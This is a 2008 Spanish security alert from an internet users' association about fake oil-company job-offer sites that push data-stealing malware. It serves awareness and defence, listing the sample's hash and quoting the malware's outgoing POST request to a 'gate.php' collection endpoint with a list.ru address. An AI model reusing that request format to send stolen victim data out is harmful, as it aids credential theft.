crimeware

ir a menu
ir a noticias
ir a bloques informativos
Ir a Página sobre accesibilidad
Ir a Página de Inicio
Ir a Página de Texto
Ir a Mapa web
Ir a Buscador
Ir a Aviso Legal
Contactar con la Asociación de Internautas
Comprueba tu velocidad de conexion, ADSL, Cable, RTB
logo de la Asociación de Internautaslogo de la Comision Seguridad Asociación de Internautas
logo ASOCIATE de la Asociación de Internautas
Inicio | Contactar

Menu

Noticias

Ayuda a la Asociación de Internautas con tu donación

Scam de petrolera que descarga malware.

Conocíamos variantes de phishing con malware, felicitaciones con malware, pero los delincuentes dan otra vuelta mas de tuerca y esta vez realizan ofertas falsas de trabajo (scam) que contienen malware para obtener información de las victimas.

11-05-2008 - La Comisión de Seguridad de la Asociación de Internautas lleva varios días analizando distintas web preparadas para realizar un ataque de scam donde usan la imagen de distintas petroleras y donde se esta detectando una nueva combinación de ofertas falsas de trabajo junto a malware para robar información de las victimas de esta trampa.

Hace unos días alertábamos de varias webs falsas que simulan petroleras y hospitales, entre ellas se encontraba la petrolera española-argentina: Repsol-YPF ,afortunadamente estas webs fueron cerradas tras el aviso de la Comisión de Seguridad de la Asociación de Internautas, pero tras esta nueva investigación se puede comprobar que los delincuentes están preparados para un nuevo ataque a gran escala, recordamos que la campaña de hacienda acaba de iniciarse y estas variantes con contenido malware también pueden ser usadas para distintos ataques, por ellos no debemos bajar la guardia.

Una de las web detectadas para realizar ofertas falsas de trabajo y que descarga malware simula a una petrolera:



Si la victima visita la web fraudulenta se produce la descarga de archivo:



Características del malware:


606.208 bytes
md5: e2fe92ac73c965050f2488e6ca0a8609

Cuando se ejecuta el fichero en la maquina de la victima este se conecta a un servidor para enviar información obtenida de la victima :

POST /gate/gate.php

Content-Type: application/x-www-form-urlencoded
a=x-fan@list.ru&b=Pass&d=report&c=



La información es enviada a una lista de distribución: a=x-fan@list.ru

Desde la Asociación de Internautas queremos alertar de este tipo de ofertas FALSAS de trabajo, no bajen la guardia y recuerden que ya no hay chollos.

¿Que es el Scam?

El Scam es la captación de personas por medio de correos electrónicos, chats, irc, etc... donde empresas ficticias le ofrecen trabajar cómodamente desde casa y cobrando unos beneficios muy altos. Sin saberlo, la víctima esta blanqueando dinero obtenido por medio del phishing (procedente de estafas bancarias).

Recuerde que la Asociación de Internautas cuenta con un servicio donde pueden denunciar este tipo de intento de estafa, no dude en denunciar, entre todos podemos erradicar este tipo de engaños.

Dirección electrónica donde nos puede enviar datos de una posible estafa de Scam; phishing@internautas.org


Comisión de Seguridad en la Red.
José María Luque Guerrero
http://seguridad.internautas.org - www.seguridadenlared.org - www.seguridadpymes.es
Asociación de Internautas. www.internautas.org

Volver<<< Volver
ImprimirVersión para imprimir Impresora | Versión PDF PDF
Compartir este articulo:
Enviar artículo a un amigo:
Las direcciones de correo no se almacenan en parte alguna, simplemente son utilizadas para el envio del correo al destinatario

Bloques informativos

crimeware

últimas noticias

Top

  1. Paginas webs falsas preparadas para robar claves de usuarios de Hotmail.
  2. Guía rápida de los nuevos fraudes en la red.
  3. Tarjetas de felicitaciones y falsas actualizaciones de antivirus preparadas para robar claves de correos y clientes.
  4. Un peligro en auge. El fraude puede venir disfrazado de oferta de trabajo.
  5. Descubiertos varios servidores con troyanos bancarios españoles y con claves de usuarios.
  6. Pharming bancario, un caso real y activo.
  7. Malware disfrazado de video X de la actriz española Penélope Cruz.
  8. Como funciona un troyano bancario en el ordenador de una victima. (II Parte)
  9. ¿La banca online es vulnerable? (1ª Parte)
  10. Caja Madrid, Ibercaja, Banesto, La Caixa, Banco Popular y Paypal España afectados por nuevos troyanos bancarios.

Seguridad Pymes

Logos y Marcas propiedad de sus respectivos autores
Se permite la reproducción total o parcial de todos los contenidos siempre que se cite la fuente y se enlace con el original
Logo AI pequeño
© 1998-2015 Asociación de Internautas
Aviso Legal - Contacto
¡Nuestro RSS! | Accesibilidad

¡Internautas Televisión! |¡Alertvir! |¡Seguridad en las PYMES! |¡Comisión de Seguridad! |¡Tienda de la Asociación de Internautas! |¡Seguridad en la Red! |¡Foros públicos de la Asociación de Internautas!